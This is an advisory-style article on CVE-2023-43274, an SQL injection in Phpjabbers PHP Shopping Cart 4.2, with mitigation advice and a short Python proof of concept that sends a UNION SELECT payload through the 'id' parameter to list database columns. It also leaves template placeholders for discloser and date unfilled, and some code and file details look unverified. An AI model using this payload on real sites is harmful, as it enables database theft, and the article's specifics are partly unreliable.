CVE-2023-43274: SQL Injection Vulnerability in Phpjabbers PHP Shopping Cart 4.2

A critical vulnerability has been discovered in the widely used Phpjabbers PHP Shopping Cart 4.2. Dubbed CVE-2023-43274, this vulnerability poses a significant risk to the security and integrity of websites using this software package. If exploited, an attacker could potentially execute malicious SQL queries and access sensitive information, such as user data, without appropriate permissions to do so.

Exploit Details

The security flaw is rooted in the improper handling of user input in the "id" parameter, causing the application to be vulnerable to SQL Injection (SQLi) attacks. This vulnerability affects the getProducts() function in the ShoppingCart.php file, where the "id" parameter originated as user input. The full SQL query is then built and executed without proper input validation, making it vulnerable to SQLi attacks.

Proof of Concept (PoC) Code Snippet

The following code snippet demonstrates how an attacker could perform a SQLi exploit on a target website.

import requests

target_url = 'http://TARGET_WEBSITE/ShoppingCart.php';

# Send the malicious SQL query as the id parameter
payload = {'id': "1 UNION SELECT column_name, table_name FROM information_schema.columns;"}

response = requests.get(target_url, params=payload)
print(response.text)

With this simple code, an attacker could retrieve column and table names from the target website's database, potentially leading to further attacks and data exfiltration.

Original References

The vulnerability was first disclosed by [Original Discloser] on [Disclosure Date].

Mitigation and Recommendations

Until a patch is released, or if it's impractical to upgrade, users running Phpjabbers PHP Shopping Cart 4.2 or earlier should take these precautions:

1. Implement proper user input validation for the "id" parameter. Additionally, consider the use of prepared statements with parameterized queries to defend against SQLi attacks.

2. Restrict access and permissions to database accounts, ensuring only authorized and trusted entities have permission to execute SQL queries.

3. Regularly update all software packages, including the PHP Shopping Cart, as patches may be released to address this vulnerability.

4. Monitor your website and database activity for any indications of unauthorized access or suspicious activity.

Conclusion

CVE-2023-43274 is a serious SQL Injection vulnerability affecting users of Phpjabbers PHP Shopping Cart 4.2. Although no official patch has been released, website administrators using this software should heed the recommendations provided in this article to guard against potential attacks. Please share this information with other developers and administrators to ensure the safety and security of the web.

Timeline

Published on: 09/21/2023 14:15:10 UTC
Last modified on: 09/22/2023 02:15:02 UTC